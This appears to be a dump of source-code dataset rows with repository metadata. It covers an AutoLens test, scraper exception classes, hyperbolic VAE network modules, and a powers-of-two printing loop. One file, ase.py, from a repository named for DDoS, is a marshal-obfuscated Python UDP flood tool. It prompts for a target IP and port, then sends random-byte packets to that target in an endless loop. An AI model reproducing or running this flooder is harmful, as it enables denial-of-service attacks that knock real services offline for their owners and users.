| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cfbaff7d5c4fbb162ed5254a9891033b9b65207c
| 866
|
py
|
Python
|
test_autolens/analysis/test_setup.py
|
Jammy2211/AutoLens
|
bc132a21d1a52248f08f198474e29f985e365d85
|
[
"MIT"
] | 114
|
2018-03-05T07:31:47.000Z
|
2022-03-08T06:40:52.000Z
|
test_autolens/lens/model/test_setup.py
|
Jammy2211/PyAutoLens
|
728100a3bf13f89f35030724aa08593ab44e65eb
|
[
"MIT"
] | 143
|
2018-01-31T09:57:13.000Z
|
2022-03-16T09:41:05.000Z
|
test_autolens/analysis/test_setup.py
|
Jammy2211/AutoLens
|
bc132a21d1a52248f08f198474e29f985e365d85
|
[
"MIT"
] | 33
|
2018-01-31T12:15:57.000Z
|
2022-01-08T18:31:02.000Z
|
import autolens as al
class TestSetupHyper:
    def test__hyper_galaxies_names_for_lens_and_source(self):
        """The lens/source flags combine into hyper_galaxies and the name list."""
        cases = [
            (False, False, False, None),
            (True, False, True, ["lens"]),
            (False, True, True, ["source"]),
            (True, True, True, ["lens", "source"]),
        ]
        for lens_flag, source_flag, expected_enabled, expected_names in cases:
            setup = al.SetupHyper(
                hyper_galaxies_lens=lens_flag, hyper_galaxies_source=source_flag
            )
            assert setup.hyper_galaxies is expected_enabled
            assert setup.hyper_galaxy_names == expected_names
| 39.363636
| 86
| 0.714781
| 109
| 866
| 5.348624
| 0.220183
| 0.28988
| 0.219554
| 0.171527
| 0.823328
| 0.777015
| 0.777015
| 0.777015
| 0.777015
| 0.715266
| 0
| 0
| 0.212471
| 866
| 21
| 87
| 41.238095
| 0.854839
| 0
| 0
| 0.2
| 0
| 0
| 0.023669
| 0
| 0
| 0
| 0
| 0
| 0.533333
| 1
| 0.066667
| false
| 0
| 0.066667
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
320447eccb2cacfa63377525dfe40603d20662d7
| 118
|
py
|
Python
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 2
|
2019-02-09T03:36:03.000Z
|
2020-09-29T17:04:39.000Z
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 6
|
2018-08-05T21:59:22.000Z
|
2019-02-20T20:45:07.000Z
|
src/yggscr/exceptions.py
|
architek/yggscr
|
a0130f9374c4e4e3e3f397a8e0588b3852fcba24
|
[
"ISC"
] | 1
|
2019-04-15T19:24:39.000Z
|
2019-04-15T19:24:39.000Z
|
class YggException(Exception):
    """Generic ygg scraper error."""


class LoginFailed(Exception):
    """Raised when a login attempt is rejected."""


class TooManyFailedLogins(Exception):
    """Raised after repeated unsuccessful login attempts."""
| 14.75
| 42
| 0.813559
| 12
| 118
| 8
| 0.5
| 0.40625
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110169
| 118
| 7
| 43
| 16.857143
| 0.914286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
5c584372008a55c56425e2e1241ebac016da0017
| 14,890
|
py
|
Python
|
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | 4
|
2021-11-23T07:24:16.000Z
|
2021-12-13T14:25:25.000Z
|
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | null | null | null |
pvae/models/architectures.py
|
jacv050/capturing-implicit-hierarchical-structure
|
c461f069e058a338ead2520ea9ae0d0fa9ae4f0a
|
[
"MIT"
] | 2
|
2021-12-28T10:27:47.000Z
|
2022-01-24T12:41:59.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from numpy import prod
from pvae.utils import Constants
from pvae.ops.manifold_layers import GeodesicLayer, MobiusLayer, LogZero, ExpZero, GyroplaneConvLayer
def extra_hidden_layer(hidden_dim, non_lin):
    """Return one hidden block: a square Linear layer followed by `non_lin`."""
    linear = nn.Linear(hidden_dim, hidden_dim)
    return nn.Sequential(linear, non_lin)
class EncLinear(nn.Module):
    """Plain MLP encoder: flattens the input and emits (mu, scale, manifold)."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
        super(EncLinear, self).__init__()
        self.manifold = manifold
        self.data_size = data_size
        stack = [nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.enc = nn.Sequential(*stack)
        self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
        # A single scale output when the prior is isotropic.
        self.fc22 = nn.Linear(hidden_dim, 1 if prior_iso else manifold.coord_dim)

    def forward(self, x):
        flat = x.view(*x.size()[:-len(self.data_size)], -1)  # flatten data dims
        feats = self.enc(flat)
        mu = self.fc21(feats)
        scale = F.softplus(self.fc22(feats)) + Constants.eta
        return mu, scale, self.manifold
class DecLinear(nn.Module):
    """Plain MLP decoder: maps a latent code to a mean with unit variance."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecLinear, self).__init__()
        self.data_size = data_size
        stack = [nn.Sequential(nn.Linear(manifold.coord_dim, hidden_dim), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.dec = nn.Sequential(*stack)
        self.fc31 = nn.Linear(hidden_dim, prod(data_size))

    def forward(self, z):
        feats = self.dec(z)
        # Restore the data dimensions on top of the batch dims of z.
        mu = self.fc31(feats).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class EncWrapped(nn.Module):
    """MLP encoder whose mean is mapped onto the manifold via exp-map at the origin."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
        super(EncWrapped, self).__init__()
        self.manifold = manifold
        self.data_size = data_size
        stack = [nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.enc = nn.Sequential(*stack)
        self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
        # A single scale output when the prior is isotropic.
        self.fc22 = nn.Linear(hidden_dim, 1 if prior_iso else manifold.coord_dim)

    def forward(self, x):
        flat = x.view(*x.size()[:-len(self.data_size)], -1)  # flatten data dims
        feats = self.enc(flat)
        mu = self.manifold.expmap0(self.fc21(feats))
        scale = F.softplus(self.fc22(feats)) + Constants.eta
        return mu, scale, self.manifold
class DecWrapped(nn.Module):
    """MLP decoder preceded by a logarithm map at the origin.

    (The original docstring said "encoder"; this is the decoder counterpart
    of EncWrapped.)
    """

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecWrapped, self).__init__()
        self.data_size = data_size
        self.manifold = manifold
        stack = [nn.Sequential(nn.Linear(manifold.coord_dim, hidden_dim), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.dec = nn.Sequential(*stack)
        self.fc31 = nn.Linear(hidden_dim, prod(data_size))

    def forward(self, z):
        z = self.manifold.logmap0(z)  # pull latents back to the tangent space
        feats = self.dec(z)
        mu = self.fc31(feats).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class DecGeo(nn.Module):
    """Decoder whose first layer is a hyperbolic geodesic (Hypergyroplane) layer."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecGeo, self).__init__()
        self.data_size = data_size
        stack = [nn.Sequential(GeodesicLayer(manifold.coord_dim, hidden_dim, manifold), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.dec = nn.Sequential(*stack)
        self.fc31 = nn.Linear(hidden_dim, prod(data_size))

    def forward(self, z):
        feats = self.dec(z)
        mu = self.fc31(feats).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class EncMob(nn.Module):
    """Encoder whose mean head is a Mobius layer, followed by exp-map at 0."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso):
        super(EncMob, self).__init__()
        self.manifold = manifold
        self.data_size = data_size
        stack = [nn.Sequential(nn.Linear(prod(data_size), hidden_dim), non_lin)]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.enc = nn.Sequential(*stack)
        self.fc21 = MobiusLayer(hidden_dim, manifold.coord_dim, manifold)
        # A single scale output when the prior is isotropic.
        self.fc22 = nn.Linear(hidden_dim, 1 if prior_iso else manifold.coord_dim)

    def forward(self, x):
        flat = x.view(*x.size()[:-len(self.data_size)], -1)  # flatten data dims
        feats = self.enc(flat)
        mu = self.manifold.expmap0(self.fc21(feats))
        scale = F.softplus(self.fc22(feats)) + Constants.eta
        return mu, scale, self.manifold
class DecMob(nn.Module):
    """Decoder whose first layer is a Mobius matrix multiplication (then LogZero)."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecMob, self).__init__()
        self.data_size = data_size
        stack = [nn.Sequential(
            MobiusLayer(manifold.coord_dim, hidden_dim, manifold),
            LogZero(manifold),
            non_lin,
        )]
        stack += [extra_hidden_layer(hidden_dim, non_lin) for _ in range(num_hidden_layers - 1)]
        self.dec = nn.Sequential(*stack)
        self.fc31 = nn.Linear(hidden_dim, prod(data_size))

    def forward(self, z):
        feats = self.dec(z)
        mu = self.fc31(feats).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class DecBernouilliWrapper(nn.Module):
    """Adapt a decoder to a Bernoulli likelihood: unit scale, mean passed through."""

    def __init__(self, dec):
        super(DecBernouilliWrapper, self).__init__()
        self.dec = dec  # wrapped decoder module

    def forward(self, z):
        mu = self.dec.forward(z)[0]  # discard the wrapped decoder's scale
        return torch.tensor(1.0).to(z.device), mu
################################################################################
#
# Hyperbolic VAE encoders/decoders
#
################################################################################
class EncLinearConv(nn.Module):
    """3D convolutional encoder producing (mu, scale, manifold)."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso, posterior=None, num_mixtures=None):
        super(EncLinearConv, self).__init__()
        self.manifold = manifold
        self.data_size = data_size
        self.posterior = posterior
        self.num_mixtures = num_mixtures
        # Conv stack: 1 -> 16 -> 32 -> 64 -> 128 channels, then flatten to 1024.
        self.enc = nn.Sequential(
            nn.Conv3d(in_channels=1, out_channels=16, kernel_size=(5, 5, 5), padding=(2, 2, 2)),
            nn.ReLU(),
            nn.Conv3d(in_channels=16, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(in_channels=32, out_channels=64, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(5, 5, 5)),
            nn.ReLU(),
            nn.Flatten(),
            nn.Sequential(nn.Linear(1024, hidden_dim), non_lin),
        )
        self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
        # A single scale output when the prior is isotropic.
        self.fc22 = nn.Linear(hidden_dim, 1 if prior_iso else manifold.coord_dim)

    def forward(self, x):
        feats = self.enc(x)
        mu = self.fc21(feats)
        scale = F.softplus(self.fc22(feats)) + Constants.eta
        return mu, scale, self.manifold
class DecLinearConv(nn.Module):
    """3D transposed-convolutional decoder with unit output variance."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecLinearConv, self).__init__()
        self.data_size = data_size
        # Project latents to 8 values, reshaped to a 2x2x2 single-channel volume.
        self.lin = nn.Sequential(nn.Linear(manifold.coord_dim, 8), non_lin)
        self.dec = nn.Sequential(
            nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
        )
        self.dim_reduction = nn.Sequential(
            nn.ConvTranspose3d(in_channels=1, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)),
            nn.ReLU(),
        )
        self.fc31 = nn.Sequential(
            nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)),
            nn.ReLU(),
        )

    def forward(self, z):
        latent = self.lin(z)
        volume = latent.view(-1, 1, 2, 2, 2)
        reduced = self.dim_reduction(volume)
        decoded = self.dec(reduced)
        mu = self.fc31(decoded).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class EncWrappedConv(nn.Module):
    """3D convolutional encoder whose mean is mapped onto the manifold (exp-map at 0)."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim, prior_iso, posterior=None, num_mixtures=None):
        super(EncWrappedConv, self).__init__()
        self.manifold = manifold
        self.data_size = data_size
        self.posterior = posterior
        self.num_mixtures = num_mixtures
        # Conv stack: 1 -> 16 -> 32 -> 64 -> 128 channels, then flatten to 1024.
        self.enc = nn.Sequential(
            nn.Conv3d(in_channels=1, out_channels=16, kernel_size=(5, 5, 5), padding=(2, 2, 2)),
            nn.ReLU(),
            nn.Conv3d(in_channels=16, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(in_channels=32, out_channels=64, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.Conv3d(in_channels=64, out_channels=128, kernel_size=(5, 5, 5)),
            nn.ReLU(),
            nn.Flatten(),
            nn.Sequential(nn.Linear(1024, hidden_dim), non_lin),
        )
        self.fc21 = nn.Linear(hidden_dim, manifold.coord_dim)
        # A single scale output when the prior is isotropic.
        self.fc22 = nn.Linear(hidden_dim, 1 if prior_iso else manifold.coord_dim)

    def forward(self, x):
        feats = self.enc(x)
        mu = self.manifold.expmap0(self.fc21(feats))
        scale = F.softplus(self.fc22(feats)) + Constants.eta
        return mu, scale, self.manifold
class DecWrappedConv(nn.Module):
    """3D transposed-convolutional decoder preceded by a logarithm map at 0."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecWrappedConv, self).__init__()
        self.data_size = data_size
        self.manifold = manifold
        # Project latents to 8 values, reshaped to a 2x2x2 single-channel volume.
        self.lin = nn.Sequential(nn.Linear(manifold.coord_dim, 8), non_lin)
        self.dec = nn.Sequential(
            nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
        )
        self.dim_reduction = nn.Sequential(
            nn.ConvTranspose3d(in_channels=1, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)),
            nn.ReLU(),
        )
        self.fc31 = nn.Sequential(
            nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)),
            nn.ReLU(),
        )

    def forward(self, z):
        z = self.manifold.logmap0(z)  # pull latents back to the tangent space
        latent = self.lin(z)
        volume = latent.view(-1, 1, 2, 2, 2)
        reduced = self.dim_reduction(volume)
        decoded = self.dec(reduced)
        mu = self.fc31(decoded).view(*z.size()[:-1], *self.data_size)
        return mu, torch.ones_like(mu)
class DecGyroConv(nn.Module):
    """3D transposed-convolutional decoder whose first layer is a gyroplane convolution."""

    def __init__(self, manifold, data_size, non_lin, num_hidden_layers, hidden_dim):
        super(DecGyroConv, self).__init__()
        self.data_size = data_size
        self.manifold = manifold
        self.hidden_dim = hidden_dim
        self.gyro_conv = nn.Sequential(
            GyroplaneConvLayer(in_features=manifold.coord_dim, out_channels=hidden_dim, kernel_size=1, manifold=manifold),
            nn.ReLU(),
        )
        self.dim_reduction = nn.Sequential(
            nn.ConvTranspose3d(in_channels=300, out_channels=1, kernel_size=(1, 1, 1), padding=(0, 0, 0)),
            nn.ReLU(),
        )
        self.dec = nn.Sequential(
            nn.ConvTranspose3d(in_channels=1, out_channels=64, kernel_size=(5, 5, 5), padding=(2, 2, 2)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=64, out_channels=32, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
            nn.ConvTranspose3d(in_channels=32, out_channels=16, kernel_size=(5, 5, 5), padding=(1, 1, 1)),
            nn.ReLU(),
        )
        self.fc31 = nn.Sequential(
            nn.ConvTranspose3d(in_channels=16, out_channels=1, kernel_size=(5, 5, 5)),
            nn.ReLU(),
        )

    def forward(self, z):
        batch = z.shape[1]
        gyro_feats = self.gyro_conv(z)
        reduced = self.dim_reduction(gyro_feats)
        decoded = self.dec(reduced)
        mu = self.fc31(decoded).view(-1, batch, *self.data_size)
        return mu, torch.ones_like(mu)
| 45.396341
| 138
| 0.639154
| 2,057
| 14,890
| 4.406903
| 0.070977
| 0.084611
| 0.095974
| 0.050303
| 0.878213
| 0.861666
| 0.850634
| 0.847215
| 0.844126
| 0.839713
| 0
| 0.030178
| 0.216655
| 14,890
| 328
| 139
| 45.396341
| 0.746999
| 0.053794
| 0
| 0.79845
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104651
| false
| 0
| 0.023256
| 0.003876
| 0.232558
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7a221d0a621296724c129a11629e14ae82a18639
| 4,426
|
py
|
Python
|
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | null | null | null |
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | null | null | null |
ase.py
|
gillanggans7/DdosXerXez7
|
e49054c8f3d49f6d869f3df94aac7ee4dfecd79d
|
[
"Apache-2.0"
] | 1
|
2019-05-07T11:47:28.000Z
|
2019-05-07T11:47:28.000Z
|
#Compiled InYoyurXerXez7
#2e4hTeam
#Kiya
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s0\x02\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x02\x00l\x02\x00m\x03\x00Z\x03\x00\x01d\x03\x00Z\x04\x00d\x04\x00Z\x05\x00d\x05\x00Z\x06\x00d\x06\x00Z\x07\x00d\x07\x00Z\x08\x00d\x08\x00Z\t\x00d\t\x00Z\n\x00d\n\x00Z\x0b\x00d\x0b\x00Z\x0c\x00d\x0c\x00Z\r\x00d\r\x00Z\x0e\x00d\x0e\x00Z\x0f\x00d\x08\x00Z\x10\x00d\x0f\x00Z\x11\x00d\x10\x00Z\x12\x00d\x11\x00Z\x13\x00d\x12\x00Z\x14\x00d\x13\x00Z\x15\x00d\x14\x00Z\x16\x00d\x15\x00Z\x17\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x18\x00Z\x18\x00d\x00\x00d\x01\x00l\x19\x00Z\x19\x00d\x00\x00d\x16\x00l\x1a\x00m\x1a\x00Z\x1a\x00\x01e\x1a\x00j\x1b\x00\x83\x00\x00Z\x1b\x00e\x1b\x00j\x1c\x00Z\x1c\x00e\x1b\x00j\x1d\x00Z\x1d\x00e\x1b\x00j\x1e\x00Z\x1e\x00e\x1b\x00j\x1f\x00Z\x1f\x00e\x1b\x00j \x00Z \x00e\x18\x00j\x18\x00e\x18\x00j!\x00e\x18\x00j"\x00\x83\x02\x00Z#\x00e\x19\x00j$\x00d\x17\x00\x83\x01\x00Z%\x00e\x00\x00j&\x00d\x18\x00\x83\x01\x00\x01e\x00\x00j&\x00d\x19\x00\x83\x01\x00\x01d\x1a\x00GHd\x1b\x00GHd\x1c\x00GHd\x1d\x00GHd\x1e\x00GHd\x1f\x00GHd\x1a\x00GHHe\'\x00d 
\x00\x83\x01\x00Z(\x00e)\x00d!\x00\x83\x01\x00Z*\x00e\x00\x00j&\x00d\x18\x00\x83\x01\x00\x01e\x00\x00j&\x00d"\x00\x83\x01\x00\x01d#\x00Z+\x00x[\x00e,\x00r+\x02e#\x00j-\x00e%\x00e(\x00e*\x00f\x02\x00\x83\x02\x00\x01e+\x00d$\x00\x17Z+\x00e*\x00d#\x00\x17Z*\x00d%\x00e+\x00e(\x00e*\x00f\x03\x00\x16GHe*\x00d&\x00k\x02\x00r\xd1\x01d#\x00Z*\x00q\xd1\x01q\xd1\x01Wd\x01\x00S(\'\x00\x00\x00i\xff\xff\xff\xffN(\x01\x00\x00\x00t\x05\x00\x00\x00sleeps\x07\x00\x00\x00\x1b[32;1ms\x07\x00\x00\x00\x1b[0;32ms\x07\x00\x00\x00\x1b[34;1ms\x07\x00\x00\x00\x1b[36;1ms\x07\x00\x00\x00\x1b[31;1ms\x04\x00\x00\x00\x1b[0ms\x07\x00\x00\x00\x1b[37;1ms\x07\x00\x00\x00\x1b[35;1ms\x06\x00\x00\x00\x1b[3;1ms\x07\x00\x00\x00\x1b[33;1ms\x07\x00\x00\x00\x1b[0;33ms\x07\x00\x00\x00\x1b[30;1ms\x05\x00\x00\x00\x1b[31ms\x07\x00\x00\x00\x1b[1;32ms\x05\x00\x00\x00\x1b[33ms\x05\x00\x00\x00\x1b[34ms\x05\x00\x00\x00\x1b[35ms\x05\x00\x00\x00\x1b[36ms\x05\x00\x00\x00\x1b[37m(\x01\x00\x00\x00t\x08\x00\x00\x00datetimei\xd2\x05\x00\x00t\x05\x00\x00\x00clears\x14\x00\x00\x00figlet XerXez|lolcats#\x00\x00\x00(:)~~~~~~~~~~~~~~~~~~~~~~~~~~~~~(:)s#\x00\x00\x00|Nick : InYour XerXez7 :|s#\x00\x00\x00|Sosmed : @Oficial_XerXez7 :|s#\x00\x00\x00|ThankTo : Friends && Allah SwT :|s#\x00\x00\x00| : :|s#\x00\x00\x00|Team : 2e4h~Buft :|s\x1c\x00\x00\x00\x1b[34;1mMasukkan IP Target : s\x1c\x00\x00\x00\x1b[34;1mMasukkan Port : s\x12\x00\x00\x00figlet Play|lolcati\x00\x00\x00\x00i\x01\x00\x00\x00s"\x00\x00\x00=> %s packet => %s 
MengirimDdos:%si\xfe\xff\x00\x00(.\x00\x00\x00t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00timeR\x00\x00\x00\x00t\x01\x00\x00\x00gt\x02\x00\x00\x00gtt\x02\x00\x00\x00btt\x01\x00\x00\x00bt\x01\x00\x00\x00mt\x01\x00\x00\x00ct\x01\x00\x00\x00pt\x01\x00\x00\x00ut\x01\x00\x00\x00Mt\x01\x00\x00\x00kt\x02\x00\x00\x00ktt\x01\x00\x00\x00at\x01\x00\x00\x00Wt\x01\x00\x00\x00Rt\x01\x00\x00\x00Gt\x01\x00\x00\x00Ot\x01\x00\x00\x00Bt\x01\x00\x00\x00Pt\x01\x00\x00\x00Ct\x02\x00\x00\x00GRt\x06\x00\x00\x00sockett\x06\x00\x00\x00randomR\x01\x00\x00\x00t\x03\x00\x00\x00nowt\x04\x00\x00\x00hourt\x06\x00\x00\x00minutet\x03\x00\x00\x00dayt\x05\x00\x00\x00montht\x04\x00\x00\x00yeart\x07\x00\x00\x00AF_INETt\n\x00\x00\x00SOCK_DGRAMt\x04\x00\x00\x00sockt\x08\x00\x00\x00_urandomt\x05\x00\x00\x00bytest\x06\x00\x00\x00systemt\t\x00\x00\x00raw_inputt\x02\x00\x00\x00ipt\x05\x00\x00\x00inputt\x04\x00\x00\x00portt\x04\x00\x00\x00sentt\x04\x00\x00\x00Truet\x06\x00\x00\x00sendto(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<debby>t\x08\x00\x00\x00<module>\x04\x00\x00\x00sv\x00\x00\x00\x0c\x01\x0c\x01\x0c\x01\x10\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x02\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x02\x10\x01\x0c\x01\t\x01\t\x01\t\x01\t\x01\t\x02\x18\x01\x0f\x02\r\x01\r\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x05\x01\x01\x01\x0c\x01\x0c\x02\r\x01\r\x01\x06\x01\t\x01\x16\x01\n\x01\n\x01\x12\x01\x0c\x01'))
| 737.666667
| 4,369
| 0.741301
| 944
| 4,426
| 3.470339
| 0.173729
| 0.267399
| 0.148352
| 0.076923
| 0.392857
| 0.289377
| 0.253358
| 0.185287
| 0.154762
| 0.154762
| 0
| 0.383048
| 0.024401
| 4,426
| 5
| 4,370
| 885.2
| 0.375637
| 0.007908
| 0
| 0
| 0
| 1
| 0.604376
| 0.560848
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 11
|
7a5874d6c182281450672b2b31fd35bdb010a7eb
| 818
|
py
|
Python
|
exercises/18_sinbucles.py
|
ChromeOwO/Curso-B-sico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | 3
|
2021-05-29T23:30:56.000Z
|
2021-06-05T15:16:11.000Z
|
exercises/18_sinbucles.py
|
ChromeOwO/Curso-Basico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | null | null | null |
exercises/18_sinbucles.py
|
ChromeOwO/Curso-Basico-de-Python-Platzi
|
d97d99f25b22d3ec2f4bcadbe4f53c87d3077587
|
[
"MIT"
] | 3
|
2021-07-21T20:03:16.000Z
|
2021-07-23T15:04:19.000Z
|
# Print 2**0 through 2**8, one line each.  The original unrolled the nine
# repetitions by hand; a loop emits byte-identical output and leaves the
# module-level variable `contador` equal to 8 afterwards, just like the
# unrolled version.
for contador in range(9):
    print("2 elevado a " + str(contador) + " es igual a: " + str(2 ** contador))
| 30.296296
| 76
| 0.594132
| 126
| 818
| 3.857143
| 0.126984
| 0.148148
| 0.240741
| 0.259259
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0.965021
| 0
| 0.042254
| 0.218826
| 818
| 26
| 77
| 31.461538
| 0.71831
| 0
| 0
| 0.5
| 0
| 0
| 0.275061
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 9
|
8f8d0d6c3d4a815e150314a56d2ce7c420a0c208
| 766
|
py
|
Python
|
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
|
7baca0df1ca96a00de77a1a113a0011c43ad6ab8
|
[
"MIT"
] | null | null | null |
2021/bsidesahmedabad/dlppp/dlppp/solve.py
|
HaroldHH/My-CTF-Solutions
